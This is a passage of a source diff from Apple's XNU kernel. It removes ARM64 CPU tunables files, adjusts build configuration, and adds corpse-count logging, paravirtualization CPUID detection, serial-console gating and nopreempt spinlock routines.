- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-.macro APPLY_TUNABLES
-       /***** Tunables that apply to all cores, all revisions *****/
-
-       // Disable LSP flush with context switch to work around bug in LSP
-       // that can cause Typhoon to wedge when CONTEXTIDR is written.
-       // <rdar://problem/12387704>
-       HID_SET_BITS ARM64_REG_HID0, ARM64_REG_HID0_LoopBuffDisb, $1
-       HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_rccDisStallInactiveIexCtl, $1
-       HID_SET_BITS ARM64_REG_HID3, ARM64_REG_HID3_DisXmonSnpEvictTriggerL2StarvationMode, $1
-       HID_CLEAR_BITS ARM64_REG_HID5, (ARM64_REG_HID5_DisHwpLd | ARM64_REG_HID5_DisHwpSt), $1
-
-       // Change the default memcache data set ID from 0 to 15 for all agents
-       HID_SET_BITS ARM64_REG_HID8, (ARM64_REG_HID8_DataSetID0_VALUE | ARM64_REG_HID8_DataSetID1_VALUE), $1
-
-       /***** Tunables that apply to all P cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to all E cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to specific cores, all revisions *****/
-       EXEC_COREEQ_REVALL MIDR_CAPRI, $0, $1
-       HID_SET_BITS ARM64_REG_HID8, ARM64_REG_HID8_DataSetID2_VALUE, $1
-       EXEC_END
-
-       /***** Tunables that apply to specific cores and revisions *****/
-       /* N/A */
-
-       isb             sy
-.endmacro
\ No newline at end of file
diff --git a/osfmk/arm64/tunables/tunables_h8.s b/osfmk/arm64/tunables/tunables_h8.s
deleted file mode 100644 (file)
index 0f2a5d7..0000000
+++ /dev/null
@@ -1,60 +0,0 @@
-/*
- * Copyright (c) 2019 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-.macro APPLY_TUNABLES
-       /***** Tunables that apply to all cores, all revisions *****/
-       HID_CLEAR_BITS ARM64_REG_HID11, ARM64_REG_HID11_DisFillC1BubOpt, $1
-
-       // Change the default memcache data set ID from 0 to 15 for all agents
-       HID_SET_BITS ARM64_REG_HID8, (ARM64_REG_HID8_DataSetID0_VALUE | ARM64_REG_HID8_DataSetID1_VALUE), $1
-       HID_SET_BITS ARM64_REG_HID8, (ARM64_REG_HID8_DataSetID2_VALUE | ARM64_REG_HID8_DataSetID3_VALUE), $1
-
-       // Use 4-cycle MUL latency to avoid denormal stalls
-       HID_SET_BITS ARM64_REG_HID7, ARM64_REG_HID7_disNexFastFmul, $1
-
-       // disable reporting of TLB-multi-hit-error
-       // <rdar://problem/22163216>
-       HID_CLEAR_BITS ARM64_REG_LSU_ERR_STS, ARM64_REG_LSU_ERR_STS_L1DTlbMultiHitEN, $1
-
-       /***** Tunables that apply to all P cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to all E cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to specific cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to specific cores and revisions *****/
-
-       // rdar://problem/36112905: Set CYC_CFG:skipInit to pull in isAlive by one DCLK
-       // to work around potential hang.  Must only be applied to Maui C0.
-       EXEC_COREEQ_REVEQ MIDR_MAUI, CPU_VERSION_C0, $0, $1
-       HID_SET_BITS ARM64_REG_CYC_CFG, ARM64_REG_CYC_CFG_skipInit, $1
-       EXEC_END
-       isb             sy
-.endmacro
\ No newline at end of file
diff --git a/osfmk/arm64/tunables/tunables_h9.s b/osfmk/arm64/tunables/tunables_h9.s
deleted file mode 100644 (file)
index c44e91c..0000000
+++ /dev/null
@@ -1,61 +0,0 @@
-/*
- * Copyright (c) 2019 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-.macro APPLY_TUNABLES
-       /***** Tunables that apply to all cores, all revisions *****/
-
-       // IC prefetch configuration
-       // <rdar://problem/23019425>
-       HID_INSERT_BITS ARM64_REG_HID0, ARM64_REG_HID0_ICPrefDepth_bmsk, ARM64_REG_HID0_ICPrefDepth_VALUE, $1
-       HID_SET_BITS ARM64_REG_HID0, ARM64_REG_HID0_ICPrefLimitOneBrn, $1
-
-       // disable reporting of TLB-multi-hit-error
-       // <rdar://problem/22163216>
-       HID_CLEAR_BITS ARM64_REG_LSU_ERR_CTL, ARM64_REG_LSU_ERR_CTL_L1DTlbMultiHitEN, $1
-
-       // disable crypto fusion across decode groups
-       // <rdar://problem/27306424>
-       HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_disAESFuseAcrossGrp, $1
-
-       /***** Tunables that apply to all P cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to all E cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to specific cores, all revisions *****/
-       EXEC_COREEQ_REVALL MIDR_MYST, $0, $1
-       // Clear DisDcZvaCmdOnly
-       // Per Myst A0/B0 tunables document
-       // <rdar://problem/27627428> Myst: Confirm ACC Per-CPU Tunables
-       HID_CLEAR_BITS ARM64_REG_HID3, ARM64_REG_HID3_DisDcZvaCmdOnly, $1
-       HID_CLEAR_BITS ARM64_REG_EHID3, ARM64_REG_HID3_DisDcZvaCmdOnly, $1
-       EXEC_END
-
-       /***** Tunables that apply to specific cores and revisions *****/
-       /* N/A */
-.endmacro
\ No newline at end of file
index bdf7fe02e3ea4e4edd0000be9142a562a449acdd..a09b5d2c3df4044d5d1129e4fa68290af182ff12 100644 (file)
@@ -132,7 +132,6 @@ uat.o_CFLAGS_ADD += -Wno-implicit-int-conversion
 video_console.o_CFLAGS_ADD += -Wno-implicit-int-conversion
 xcpm_dvfs.o_CFLAGS_ADD += -Wno-implicit-int-conversion
 xcpm_ioctl.o_CFLAGS_ADD += -Wno-implicit-int-conversion
-zalloc.o_CFLAGS_ADD += -Wno-implicit-int-conversion
 # -Wno-shorten-64-to-32
 arm_vm_init.o_CFLAGS_ADD += -Wno-shorten-64-to-32
 backtrace.o_CFLAGS_ADD += -Wno-shorten-64-to-32
@@ -166,7 +165,6 @@ vm_object.o_CFLAGS_ADD += -Wno-shorten-64-to-32
 vm_shared_region_pager.o_CFLAGS_ADD += -Wno-shorten-64-to-32
 vm_swapfile_pager.o_CFLAGS_ADD += -Wno-shorten-64-to-32
 vm_user.o_CFLAGS_ADD += -Wno-shorten-64-to-32
-zalloc.o_CFLAGS_ADD += -Wno-shorten-64-to-32
 # -Wno-sign-conversion
 Diagnostics.o_CFLAGS_ADD += -Wno-sign-conversion
 acpi.o_CFLAGS_ADD += -Wno-sign-conversion
@@ -368,8 +366,6 @@ xcpm_dvfs.o_CFLAGS_ADD += -Wno-sign-conversion
 xcpm_fi.o_CFLAGS_ADD += -Wno-sign-conversion
 xcpm_idle.o_CFLAGS_ADD += -Wno-sign-conversion
 xcpm_ioctl.o_CFLAGS_ADD += -Wno-sign-conversion
-zalloc.o_CFLAGS_ADD += -Wno-sign-conversion
-zcache.o_CFLAGS_ADD += -Wno-sign-conversion
 
 # Rebuild if per-file overrides change
 ${OBJS}: $(firstword $(MAKEFILE_LIST))
index 991216abdd7c32829aea235a79cd2ffbb5c34e63..a7e18d8955bb3a2581134f58d129cbfb66b90a8f 100644 (file)
@@ -49,7 +49,6 @@ OPTIONS/mach_vm_debug         optional mach_vm_debug
 OPTIONS/mach_page_hash_stats    optional mach_page_hash_stats
 OPTIONS/mig_debug              optional mig_debug
 OPTIONS/vm_cpm                 optional vm_cpm
-OPTIONS/task_swapper           optional task_swapper
 OPTIONS/stack_usage            optional stack_usage
 OPTIONS/importance_inheritance optional importance_inheritance
 OPTIONS/importance_debug       optional importance_debug
@@ -79,8 +78,8 @@ OPTIONS/config_quiesce_counter  optional config_quiesce_counter
 #
 # UserNotification files
 #
-./UserNotification/UNDRequest.c                        standard
-./UserNotification/UNDReplyServer.c            standard
+./UserNotification/UNDRequest.c                        optional config_user_notification
+./UserNotification/UNDReplyServer.c            optional config_user_notification
 osfmk/UserNotification/KUNCUserNotifications.c standard
 
 osfmk/kdp/kdp.c                        optional config_kdp_interactive_debugging
@@ -120,7 +119,7 @@ osfmk/kern/build_config.c           standard
 osfmk/kern/clock.c                     standard
 osfmk/kern/clock_oldops.c              standard
 osfmk/kern/coalition.c                 optional config_coalitions
-osfmk/kern/counters.c                  standard
+osfmk/kern/counter_common.c            standard
 osfmk/kern/cpu_quiesce.c               optional config_quiesce_counter
 osfmk/kern/debug.c                     standard
 osfmk/kern/ecc_logging.c                       optional config_ecc_logging
@@ -175,7 +174,6 @@ osfmk/kern/syscall_sw.c             standard
 osfmk/kern/sysdiagnose.c       optional config_sysdiagnose
 osfmk/kern/task.c                      standard
 osfmk/kern/task_policy.c       standard
-osfmk/kern/task_swap.c         standard
 osfmk/kern/test_lock.c         optional development
 osfmk/kern/test_lock.c         optional debug
 osfmk/kern/test_mpsc_queue.c   optional development
@@ -192,7 +190,6 @@ osfmk/kern/ux_handler.c             standard
 osfmk/kern/waitq.c                     standard
 osfmk/kern/work_interval.c             standard
 osfmk/kern/zalloc.c                    standard
-osfmk/kern/zcache.c            optional config_zcache
 osfmk/kern/gzalloc.c           optional config_gzalloc
 osfmk/kern/bsd_kern.c          optional mach_bsd
 osfmk/kern/hibernate.c         optional hibernation
@@ -200,6 +197,7 @@ osfmk/kern/remote_time.c        standard
 osfmk/kern/memset_s.c          standard
 osfmk/kern/copyout_shim.c      optional copyout_shim
 osfmk/kern/suid_cred.c         standard
+osfmk/kern/task_ident.c     standard
 
 ./mach/clock_server.c                  standard
 ./mach/clock_priv_server.c             standard
@@ -250,6 +248,7 @@ osfmk/voucher/ipc_pthread_priority.c                standard
 ./mach/fairplayd_notification_user.c optional config_arcade
 ./mach/arcade_upcall_user.c optional config_arcade
 ./mach/arcade_register_server.c optional config_arcade
+./mach/iocompressionstats_notification_user.c optional config_io_compression_stats
 
 #
 # For now, no external pagers
index 74181f5e9a362b6c0210b949d50496155039dfc3..1d0f04be6ccc5a6b03ede067fa8d59413ecd0555 100644 (file)
@@ -53,6 +53,7 @@ osfmk/arm/trustcache.c                standard
 osfmk/arm/model_dep.c          standard
 osfmk/arm/pcb.c                standard
 osfmk/arm/rtclock.c            standard
+osfmk/arm/counter.c            standard
 osfmk/arm/status.c             standard
 osfmk/arm/status_shared.c      standard
 osfmk/arm/trap.c               standard
index b8f235bdb9e629ce951269c76688a0e20f6670dc..266a05ca1263b6be0fc395753a4f31303ac35c1a 100644 (file)
@@ -96,3 +96,5 @@ osfmk/arm64/pgtrace.c           standard
 osfmk/arm64/pgtrace_decoder.c   optional config_pgtrace_nonkext
 osfmk/arm64/machine_remote_time.c optional config_mach_bridge_recv_time
 osfmk/arm64/corecrypto/sha256_compress_arm64.s standard
+
+osfmk/arm/counter.c    standard
index 5393a8cd6f814ef67a5c7d147c07798801084770..37136bd6387b2234c5c7914d55ce7649218019b9 100644 (file)
@@ -94,8 +94,10 @@ osfmk/i386/ucode.c                           standard
 
 osfmk/i386/vmx/vmx_cpu.c                       optional config_vmx
 osfmk/i386/vmx/vmx_shims.c                     optional config_vmx
+osfmk/i386/x86_hypercall.c                     optional development
 
 osfmk/kern/hv_support_kext.c                   optional hypervisor
+osfmk/kern/hv_io_notifier.c                    optional hypervisor
 
 # DUMMIES TO FORCE GENERATION OF .h FILES
 #osfmk/OPTIONS/ln              optional ln
@@ -114,3 +116,4 @@ osfmk/x86_64/idt64.s                standard
 osfmk/i386/panic_hooks.c       standard
 osfmk/i386/panic_notify.c      standard
 osfmk/x86_64/machine_remote_time.c             optional config_mach_bridge_send_time
+osfmk/x86_64/counter.c         standard
index 586562011ad4e35da5354b96653ba8098ea671b9..980a7810d3c36e1cf9abc3504b4693f2c5957959 100644 (file)
@@ -317,7 +317,15 @@ get_cons_ops_index(void)
 static inline void
 _cnputs(char * c, int size)
 {
-       uint32_t idx = get_cons_ops_index();
+       extern int disableConsoleOutput;
+
+       if (disableConsoleOutput) {
+               return;
+       }
+
+       assert(c != NULL);
+
+       const uint32_t idx = get_cons_ops_index();
 
        while (size-- > 0) {
                if (*c == '\n') {
index 62bde9741ec1acdd9c949d31b9628e6415db09ca..34ba2b4e44f3521ef6344f049bfe5aa828bed105 100644 (file)
@@ -113,8 +113,13 @@ switch_to_video_console(void)
 int
 switch_to_serial_console(void)
 {
+       extern bool serial_console_enabled;
        int old_cons_ops = cons_ops_index;
-       cons_ops_index = SERIAL_CONS_OPS;
+
+       if (serial_console_enabled) {
+               cons_ops_index = SERIAL_CONS_OPS;
+       }
+
        return old_cons_ops;
 }
 
index d440c79bd3418b4bd750083256def0124224324b..fcb67e2020192de9e051385b029d33a422060c1e 100644 (file)
 #include <kern/kern_cdata.h>
 #include <mach/mach_vm.h>
 #include <kern/exc_guard.h>
+#include <os/log.h>
 
 #if CONFIG_MACF
 #include <security/mac_mach_internal.h>
@@ -218,6 +219,9 @@ total_corpses_count(void)
        return gate.corpses;
 }
 
+extern char *proc_best_name(struct proc *);
+extern int proc_pid(struct proc *);
+
 /*
  * Routine: task_crashinfo_get_ref()
  *          Grab a slot at creating a corpse.
@@ -227,6 +231,7 @@ static kern_return_t
 task_crashinfo_get_ref(corpse_flags_t kcd_u_flags)
 {
        union corpse_creation_gate oldgate, newgate;
+       struct proc *p = (void *)current_proc();
 
        assert(kcd_u_flags & CORPSE_CRASHINFO_HAS_REF);
 
@@ -235,10 +240,14 @@ task_crashinfo_get_ref(corpse_flags_t kcd_u_flags)
                newgate = oldgate;
                if (kcd_u_flags & CORPSE_CRASHINFO_USER_FAULT) {
                        if (newgate.user_faults++ >= TOTAL_USER_FAULTS_ALLOWED) {
+                               os_log(OS_LOG_DEFAULT, "%s[%d] Corpse failure, too many faults %d\n",
+                                   proc_best_name(p), proc_pid(p), newgate.user_faults);
                                return KERN_RESOURCE_SHORTAGE;
                        }
                }
                if (newgate.corpses++ >= TOTAL_CORPSES_ALLOWED) {
+                       os_log(OS_LOG_DEFAULT, "%s[%d] Corpse failure, too many %d\n",
+                           proc_best_name(p), proc_pid(p), newgate.corpses);
                        return KERN_RESOURCE_SHORTAGE;
                }
 
@@ -246,6 +255,8 @@ task_crashinfo_get_ref(corpse_flags_t kcd_u_flags)
                if (atomic_compare_exchange_strong_explicit(&inflight_corpses,
                    &oldgate.value, newgate.value, memory_order_relaxed,
                    memory_order_relaxed)) {
+                       os_log(OS_LOG_DEFAULT, "%s[%d] Corpse allowed %d of %d\n",
+                           proc_best_name(p), proc_pid(p), newgate.corpses, TOTAL_CORPSES_ALLOWED);
                        return KERN_SUCCESS;
                }
        }
@@ -277,6 +288,7 @@ task_crashinfo_release_ref(corpse_flags_t kcd_u_flags)
                if (atomic_compare_exchange_strong_explicit(&inflight_corpses,
                    &oldgate.value, newgate.value, memory_order_relaxed,
                    memory_order_relaxed)) {
+                       os_log(OS_LOG_DEFAULT, "Corpse released, count at %d\n", newgate.corpses);
                        return KERN_SUCCESS;
                }
        }
@@ -653,7 +665,7 @@ error_task_generate_corpse:
                        /* Terminate all the other threads in the task. */
                        queue_iterate(&new_task->threads, thread_next, thread_t, task_threads)
                        {
-                               thread_terminate_internal(thread_next);
+                               thread_terminate_internal(thread_next, TH_TERMINATE_OPTION_NONE);
                        }
                        /* wait for all the threads in the task to terminate */
                        task_wait_till_threads_terminate_locked(new_task);
index f7102315801b851d702bd3b5a9b6046008bad197..6c1c7fac36c69fb8495100ef99a33f25da9059d0 100644 (file)
@@ -41,7 +41,6 @@
 
 #include <kern/clock.h>
 #include <kern/spl.h>
-#include <kern/counters.h>
 #include <kern/queue.h>
 #include <kern/zalloc.h>
 #include <kern/thread.h>
@@ -181,6 +180,12 @@ iokit_release_port( ipc_port_t port )
        ipc_port_release( port );
 }
 
+EXTERN void
+iokit_make_port_send( ipc_port_t port )
+{
+       ipc_port_make_send( port );
+}
+
 EXTERN void
 iokit_release_port_send( ipc_port_t port )
 {
@@ -310,9 +315,8 @@ iokit_make_send_right( task_t task, io_object_t obj, ipc_kobject_type_t type )
                // thread-argument-passing and its value should not be garbage
                current_thread()->ith_knote = ITH_KNOTE_NULL;
                kr = ipc_object_copyout( task->itk_space, ip_to_object(sendPort),
-                   MACH_MSG_TYPE_PORT_SEND, NULL, NULL, &name);
+                   MACH_MSG_TYPE_PORT_SEND, IPC_OBJECT_COPYOUT_FLAGS_NONE, NULL, NULL, &name);
                if (kr != KERN_SUCCESS) {
-                       ipc_port_release_send( sendPort );
                        name = MACH_PORT_NULL;
                }
        } else if (sendPort == IP_NULL) {
index 06391748edea5120daefa463dd6593e47c13c985..2d6d61ec1f755843f4301c6f032515c9a2144b3f 100644 (file)
@@ -18,6 +18,7 @@ EXPORT_ONLY_FILES =   \
                    cpuid.h \
                    eflags.h \
                    fpu.h \
+                       x86_hypercall.h \
                    io_map_entries.h \
                    lapic.h \
                    lock.h \
index d4e14d5118bbe15657d89d271aa42062c15324f7..2af7ed288cdeb4d23928625d0cd82271a0bbb36c 100644 (file)
@@ -347,6 +347,12 @@ acpi_sleep_kernel(acpi_sleep_callback func, void *refcon)
        init_fpu();
        clear_ts();
 
+
+#if HYPERVISOR
+       /* Notify hypervisor that we are about to resume */
+       hv_resume();
+#endif
+
        IOCPURunPlatformActiveActions();
 
        KDBG(IOKDBG_CODE(DBG_HIBERNATE, 0) | DBG_FUNC_END, start, elapsed,
@@ -361,7 +367,6 @@ acpi_sleep_kernel(acpi_sleep_callback func, void *refcon)
        /* Restart timer interrupts */
        rtc_timer_start();
 
-
 #if MONOTONIC
        mt_cpu_up(cdp);
 #endif /* MONOTONIC */
index 7c01567eae02a17b628fea8122e9172bd2e645ba..b25d0f5d6b5f4853e2ff2c2ab2cf0afc554f0c43 100644 (file)
@@ -34,7 +34,6 @@
 #include <mach/thread_status.h>
 #include <mach/vm_param.h>
 
-#include <kern/counters.h>
 #include <kern/cpu_data.h>
 #include <kern/mach_param.h>
 #include <kern/task.h>
@@ -483,7 +482,7 @@ mach_call_arg_munger32(uint32_t sp, struct mach_call_args *args, const mach_trap
 
 __private_extern__ void mach_call_munger(x86_saved_state_t *state);
 
-extern const char *mach_syscall_name_table[];
+extern const char *const mach_syscall_name_table[];
 
 __attribute__((noreturn))
 void
index 541ec6a727a8041f1836002e8f37a338bc41d71c..e117ddda986c6b6d3d1a0b3313f2a03aef950ca9 100644 (file)
@@ -33,7 +33,6 @@
 #include <mach/thread_status.h>
 #include <mach/vm_param.h>
 
-#include <kern/counters.h>
 #include <kern/cpu_data.h>
 #include <kern/mach_param.h>
 #include <kern/task.h>
index c0b62d37b66063dbfcd7cd72a29ff472ca4d4ecc..a6ef153a71baf649211c389fb1f69cf21368270e 100644 (file)
@@ -155,6 +155,10 @@ _NumCPUs( void )
 
 #else /* !KERNEL_PRIVATE */
 
+/*
+ * <sys/commpage.h> defines a couple of conveniency macros
+ * to help read data from the commpage.
+ */
 #if defined(__i386__)
 
 #define _COMM_PAGE_AREA_LENGTH          _COMM_PAGE32_AREA_LENGTH
index 06ad4090d24dc89303c8503c081d18963fc8ffa7..90844be06efc9b144cabc0cb7c84cea8ea70f53a 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2000-2019 Apple Inc. All rights reserved.
+ * Copyright (c) 2000-2020 Apple Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
@@ -219,6 +219,12 @@ boolean_t cpuid_tsx_supported = false;
 static void do_cwas(i386_cpu_info_t *cpuinfo, boolean_t on_slave);
 static void cpuid_do_precpuid_was(void);
 
+#if DEBUG || DEVELOPMENT
+static void cpuid_vmm_detect_pv_interface(i386_vmm_info_t *info_p, const char *signature,
+    bool (*)(i386_vmm_info_t*, const uint32_t, const uint32_t));
+static bool cpuid_vmm_detect_applepv_features(i386_vmm_info_t *info_p, const uint32_t base, const uint32_t max_leaf);
+#endif /* DEBUG || DEVELOPMENT */
+
 static inline cpuid_cache_descriptor_t *
 cpuid_leaf2_find(uint8_t value)
 {
@@ -1437,6 +1443,10 @@ cpuid_init_vmm_info(i386_vmm_info_t *info_p)
                info_p->cpuid_vmm_bus_frequency = reg[ebx];
        }
 
+#if DEBUG || DEVELOPMENT
+       cpuid_vmm_detect_pv_interface(info_p, APPLEPV_SIGNATURE, &cpuid_vmm_detect_applepv_features);
+#endif
+
        DBG(" vmm_vendor          : %s\n", info_p->cpuid_vmm_vendor);
        DBG(" vmm_family          : %u\n", info_p->cpuid_vmm_family);
        DBG(" vmm_bus_frequency   : %u\n", info_p->cpuid_vmm_bus_frequency);
@@ -1465,6 +1475,14 @@ cpuid_vmm_family(void)
        return cpuid_vmm_info()->cpuid_vmm_family;
 }
 
+#if DEBUG || DEVELOPMENT
+uint64_t
+cpuid_vmm_get_applepv_features(void)
+{
+       return cpuid_vmm_info()->cpuid_vmm_applepv_features;
+}
+#endif /* DEBUG || DEVELOPMENT */
+
 cwa_classifier_e
 cpuid_wa_required(cpu_wa_e wa)
 {
@@ -1596,3 +1614,68 @@ cpuid_do_precpuid_was(void)
                cpuid_tsx_disabled = true;
        }
 }
+
+
+#if DEBUG || DEVELOPMENT
+
+/*
+ * Hunt for Apple Paravirtualization support in the hypervisor class leaves [0x4000_0000-0x4001_0000].
+ * Hypervisor interfaces are expected to be found at 0x100 boundaries for compatibility.
+ */
+
+static bool
+cpuid_vmm_detect_applepv_features(i386_vmm_info_t *info_p, const uint32_t base, const uint32_t max_leaf)
+{
+       if ((max_leaf - base) < APPLEPV_LEAF_INDEX_MAX) {
+               return false;
+       }
+
+       /*
+        * Issue cpuid to make sure the interface supports "AH#1" features.
+        * This avoids a possible collision with "Hv#1" used by Hyper-V.
+        */
+       uint32_t reg[4];
+       char interface[5];
+       cpuid_fn(base + APPLEPV_INTERFACE_LEAF_INDEX, reg);
+       memcpy(&interface[0], &reg[eax], 4);
+       interface[4] = '\0';
+       if (0 == strcmp(interface, APPLEPV_INTERFACE)) {
+               cpuid_fn(base + APPLEPV_FEATURES_LEAF_INDEX, reg);
+               info_p->cpuid_vmm_applepv_features = quad(reg[ecx], reg[edx]);
+               return true;
+       }
+       return false;
+}
+
+static void
+cpuid_vmm_detect_pv_interface(i386_vmm_info_t *info_p, const char *signature,
+    bool (*searcher)(i386_vmm_info_t*, const uint32_t, const uint32_t))
+{
+       int hcalls;
+       if (PE_parse_boot_argn("hcalls", &hcalls, sizeof(hcalls)) &&
+           hcalls == 0) {
+               return;
+       }
+
+       assert(info_p);
+       /*
+        * Look for PV interface matching signature
+        */
+       for (uint32_t base = 0x40000100; base < 0x40010000; base += 0x100) {
+               uint32_t reg[4];
+               char vendor[13];
+
+               cpuid_fn(base, reg);
+               memcpy(&vendor[0], &reg[ebx], 4);
+               memcpy(&vendor[4], &reg[ecx], 4);
+               memcpy(&vendor[8], &reg[edx], 4);
+               vendor[12] = '\0';
+               if ((0 == strcmp(vendor, signature)) &&
+                   (reg[eax] - base) < 0x100 &&
+                   (*searcher)(info_p, base, reg[eax])) {
+                       break;
+               }
+       }
+}
+
+#endif /* DEBUG || DEVELOPMENT */
index 577bf616797aa3abbc77abec8fa0618dcbd10c9e..3f608f707e2c3639650ade3061675106d24ccdd4 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2000-2019 Apple Computer, Inc. All rights reserved.
+ * Copyright (c) 2000-2020 Apple Computer, Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
 #define CPUID_VMM_FAMILY_KVM            0x6
 
 
+#if DEBUG || DEVELOPMENT
+
+/*
+ * Apple Paravirtualization CPUID leaves
+ * The base leaf can be placed at any unused 0x100 aligned boundary
+ * in the hypervisor class leaves [0x4000_0000-0x4001_0000].
+ */
+
+#define APPLEPV_INTERFACE_LEAF_INDEX    1
+#define APPLEPV_FEATURES_LEAF_INDEX     2
+#define APPLEPV_LEAF_INDEX_MAX          APPLEPV_FEATURES_LEAF_INDEX
+
+#define APPLEPV_SIGNATURE               "apple-pv-xnu"
+#define APPLEPV_INTERFACE               "AH#1"
+
+/*
+ *  Apple Hypercall Feature Vector:
+ *  Values in ECX:EDX returned by the base leaf
+ */
+
+#define CPUID_LEAF_FEATURE_COREDUMP         _Bit(0)
+
+#endif /* DEBUG || DEVELOPMENT */
+
 
 #ifndef ASSEMBLER
 #include <stdint.h>
@@ -485,6 +509,7 @@ typedef struct {
        uint32_t        cpuid_vmm_family;
        uint32_t        cpuid_vmm_bus_frequency;
        uint32_t        cpuid_vmm_tsc_frequency;
+       uint64_t        cpuid_vmm_applepv_features;
 } i386_vmm_info_t;
 
 typedef enum {
@@ -553,10 +578,14 @@ extern uint32_t         cpuid_cpufamily(void);
 extern i386_cpu_info_t  *cpuid_info(void);
 extern void             cpuid_set_info(void);
 extern boolean_t        cpuid_vmm_present(void);
+extern uint32_t         cpuid_vmm_family(void);
+
+#if DEBUG || DEVELOPMENT
+extern uint64_t         cpuid_vmm_get_applepv_features(void);
+#endif /* DEBUG || DEVELOPMENT */
 
 #ifdef MACH_KERNEL_PRIVATE
 extern i386_vmm_info_t  *cpuid_vmm_info(void);
-extern uint32_t         cpuid_vmm_family(void);
 extern cwa_classifier_e cpuid_wa_required(cpu_wa_e wa);
 extern void cpuid_do_was(void);
 extern const char       *cpuid_vmm_family_string(void);
index 12cdef33aa3737c1db754d7747b97985bbb1e4ec..ad1f15c1f8d08cc3199a1835ed6ec0daae68b770 100644 (file)
@@ -129,6 +129,8 @@ int                     debug_task;
 
 int                     early_boot = 1;
 
+bool                    serial_console_enabled = false;
+
 static boot_args        *kernelBootArgs;
 
 extern int              disableConsoleOutput;
@@ -932,6 +934,7 @@ i386_init(void)
                }
        }
        if (serialmode & SERIALMODE_OUTPUT) {
+               serial_console_enabled = true;
                (void)switch_to_serial_console();
                disableConsoleOutput = FALSE; /* Allow printfs to happen */
        }
index 98d11ec507d4ae9d6b618c7ed502370841946cb7..8d6903b5ac87183d576a02c25ce1bd127ea6b63b 100644 (file)
@@ -126,6 +126,15 @@ decl_simple_lock_data(extern, panic_lock);
 
 extern unsigned int not_in_kdp;
 
+#if !LOCK_STATS
+#define usimple_lock_nopreempt(lck, grp) \
+       usimple_lock_nopreempt(lck)
+#define usimple_lock_try_nopreempt(lck, grp) \
+       usimple_lock_try_nopreempt(lck)
+#endif
+static void usimple_lock_nopreempt(usimple_lock_t, lck_grp_t *);
+static unsigned int usimple_lock_try_nopreempt(usimple_lock_t, lck_grp_t *);
+
 /*
  *     We often want to know the addresses of the callers
  *     of the various lock routines.  However, this information
@@ -341,6 +350,22 @@ lck_spin_lock(
        usimple_lock((usimple_lock_t) lck, NULL);
 }
 
+void
+lck_spin_lock_nopreempt(
+       lck_spin_t      *lck)
+{
+       usimple_lock_nopreempt((usimple_lock_t) lck, NULL);
+}
+
+void
+lck_spin_lock_nopreempt_grp(
+       lck_spin_t      *lck,
+       lck_grp_t       *grp)
+{
+#pragma unused(grp)
+       usimple_lock_nopreempt((usimple_lock_t) lck, grp);
+}
+
 /*
  *      Routine:        lck_spin_unlock
  */
@@ -351,6 +376,13 @@ lck_spin_unlock(
        usimple_unlock((usimple_lock_t) lck);
 }
 
+void
+lck_spin_unlock_nopreempt(
+       lck_spin_t      *lck)
+{
+       usimple_unlock_nopreempt((usimple_lock_t) lck);
+}
+
 boolean_t
 lck_spin_try_lock_grp(
        lck_spin_t      *lck,
@@ -383,6 +415,34 @@ lck_spin_try_lock(
        return lrval;
 }
 
+int
+lck_spin_try_lock_nopreempt(
+       lck_spin_t      *lck)
+{
